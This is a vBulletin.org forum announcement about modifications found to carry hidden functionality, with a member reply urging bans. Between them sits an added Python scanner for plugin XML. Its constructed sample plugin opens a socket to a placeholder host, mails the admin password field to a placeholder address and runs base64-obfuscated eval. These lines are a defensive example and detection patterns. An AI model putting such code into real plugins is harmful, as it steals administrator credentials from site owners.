Most of our members are using vBulletin to provide a Forum on their website(s). What are the reasons people have chosen vBulletin over other similar solutions? There can be many answers to this, but I think there is one that will be on everyone’s list: Trust.
You have bought software from a company that you trust, you are confident that they will provide you with quality software, with no known security issues. If a security issue is found, you’re confident that it will be addressed as soon as possible. Knowing this you can concentrate on your community, instead of being worried about security issues.
As your community grows you will find that you have needs for non-standard functionality, or just extras that will put your community ahead of your competition. This is where vBulletin.org comes into the picture.
Where the vBulletin software itself is created, maintained and supported by ‘professionals’, the vBulletin.org community relies solely on volunteer coders. This gives enthusiast coders the opportunity to contribute to the community and enhance the vBulletin product, making the life of running your own community easier.
Where the coders on vBulletin.org might give you professional solutions, they are on some level anonymous; it is not a company that has much to lose in case of a broken trust relationship. They will offer you software solutions, often free of charge, for your Board that you might install without ever seeing (all) of the code that is getting installed on your server. This is even more true with vBulletin 3.5, where most modifications are done by simply installing a product file, instead of manually doing code changes.
Now where is this post going? You install probably numerous modifications on your board, provided by different coders. By installing software, you give total control of your board in the hands of these ‘anonymous’ coders. This requires a high level of trust towards them.
Where common sense, reading other users' responses and testing on a Test Board can prevent you from disasters caused by coding errors (hey, we are all human) or differences in the environment, there is another vulnerability that you cannot so easily protect yourself against: hidden functionality in the installed modification.
Hidden functions that are not documented and/or disclosed by the author can lead to a lot of things. I will try to sum up a few that are possible, some ‘innocent’, some with possibly severe consequences. Some possible examples:
- A backdoor into your AdminCP
- Mailing admin passwords to the author's account.
- Call-home functions
- Usage tracking
- Disruption of service or data
- Any other technique that is used in Spyware/Malware type of software.
The stand of vBulletin.org Staff is that our members should be able to completely trust the solutions offered here as much as possible. This means that we will not tolerate any form of hidden functionality, since that is the only way we can keep the trust of the members using these solutions.
The reason for this thread is that, to our own shame, we recently received reports that there are coders who do incorporate hidden functionality in their modifications. Luckily the type of hidden functions could be considered relatively harmless, but we will nevertheless not tolerate this. I would like to emphasize that this did not send any security or privacy related information, nor did it in any way break the security of your site.
The discovered hidden functionality was aimed at a backdoor in the services of vBulletin.org itself, and has by now been closed. The effect of this functionality will be corrected by us soon. There have been no negative effects on the boards that are using any of these modifications.
From the time of this post on we will take the following actions upon discovery of such modifications:
- All users who have clicked Install for this modification will be notified about the issue.
- The offending modification will be withdrawn immediately.
- Depending on the severity, all modifications submitted by this author could be withdrawn immediately, and the user account of the author could be closed.
- Admin will contact the author by mail to inform him and hear his/her side of the story.
The vBulletin.org team wants to apologize for any breach of trust this has caused. We hope that our members will be confident that we are addressing these issues seriously and as well as we can, and that you can continue to have a trust relationship with the authors that offer solutions here at vBulletin.org.
vBulletin.org Team
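As an added review aid (not code from the original post or from vBulletin.org), the script below scans a vBulletin 3.5-style product XML file for the kinds of hidden functionality listed above: call-home network calls, mail-outs, obfuscated code, reading of password fields and hard-coded admin group changes. It assumes the product format's `<plugin>`/`<phpcode>` and `<code>`/`<installcode>` elements, and the sample product file is constructed; a hit only means "read this block by hand", not that the modification is malicious.

```python
"""Review aid: scan a vBulletin 3.5-style product XML for undisclosed
call-home, mail-out, obfuscated or credential-reading PHP (constructed example)."""
import re
import xml.etree.ElementTree as ET

# Indicator regexes grouped by the risk they hint at. fopen/mail have
# legitimate uses, so each hit is a prompt for manual review, not a verdict.
INDICATORS = {
    "call-home": [r"\b(fsockopen|curl_init|curl_exec|fopen|file_get_contents)\s*\("],
    "mail-out": [r"\b(mail|vbmail)\s*\("],
    "obfuscation": [r"\beval\s*\(", r"\b(base64_decode|gzinflate|str_rot13)\s*\("],
    "credential-access": [r"userinfo\[['\"](password|salt)['\"]\]"],
    "privilege-change": [r"usergroupid['\"]\]\s*=\s*['\"]?6\b"],  # 6 = Administrators
}

def _code_blocks(root):
    """Yield (label, php_source) for every embedded PHP block in the product."""
    for plugin in root.iter("plugin"):
        label = "plugin '%s' on hook %s" % (
            plugin.findtext("title", "?"), plugin.findtext("hookname", "?"))
        yield label, plugin.findtext("phpcode") or ""
    for code in root.iter("code"):  # install/uninstall code per product version
        for tag in ("installcode", "uninstallcode"):
            yield "%s v%s" % (tag, code.get("version", "?")), code.findtext(tag) or ""

def scan_product_xml(xml_text):
    """Return a list of (block_label, category, matched_text) for each indicator hit."""
    findings = []
    for label, src in _code_blocks(ET.fromstring(xml_text)):
        for category, patterns in INDICATORS.items():
            for pat in patterns:
                findings += [(label, category, m.group(0)) for m in re.finditer(pat, src)]
    return findings

# Constructed product file: one harmless plugin and one with hidden functionality.
SAMPLE_PRODUCT_XML = """<product productid="example_mod" active="1">
 <title>Example Mod</title><version>1.0</version>
 <plugins>
  <plugin active="1"><title>Show greeting</title><hookname>global_start</hookname>
   <phpcode><![CDATA[$greeting = 'Welcome, ' . $vbulletin->userinfo['username'];]]></phpcode></plugin>
  <plugin active="1"><title>Update check</title><hookname>admin_index_complete</hookname>
   <phpcode><![CDATA[
$fp = @fsockopen('example.invalid', 80);
@mail('owner@example.invalid', 'admin', $vbulletin->userinfo['password']);
eval(base64_decode('cmV0dXJuIDE7'));
]]></phpcode></plugin>
 </plugins></product>"""

if __name__ == "__main__":
    for label, category, hit in scan_product_xml(SAMPLE_PRODUCT_XML):
        print("%-18s %-22s %s" % (category, hit, label))
```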
I totally support the decisions to immediately remove all offending modifications, all modifications from the offending authors, and to ban the offending authors.
IMO, there is no reason why anyone should be doing anything untoward with their modifications. There are no excuses. Most coders release their code according to the guidelines, but yet again it is a select few who spoil it for the rest of us.
When one coder does something untoward, it reflects badly on every single coder here at vB.org. Yes, we could all include additional code in our modifications, but that would then make the problem even worse. As it stands, the problem is bad enough to warrant this announcement and proposed action.
For those who have installed modifications, be it on their test boards or live boards, I strongly encourage you to be proactive and to take notice of the code of your modifications. I understand that the majority do not know how to read PHP code; I am a relative newbie to PHP too and so find this difficult. Still, have a look at it if you can; most files open in an Internet Explorer window for review. You might be surprised at what you learn.
Again, to emphasise my stance on this:
All offending coders MUST be banned;
All offending modifications MUST be removed immediately;
All modifications from offending coders, regardless of vB version, MUST be removed;
There must be no exceptions to this. There are no excuses.
This does sound harsh, I will admit, but there are the long-term implications of this on the rest of the coding community, and the trust factor for the members, to be considered.
No action means nothing. Strong and severe action must be taken.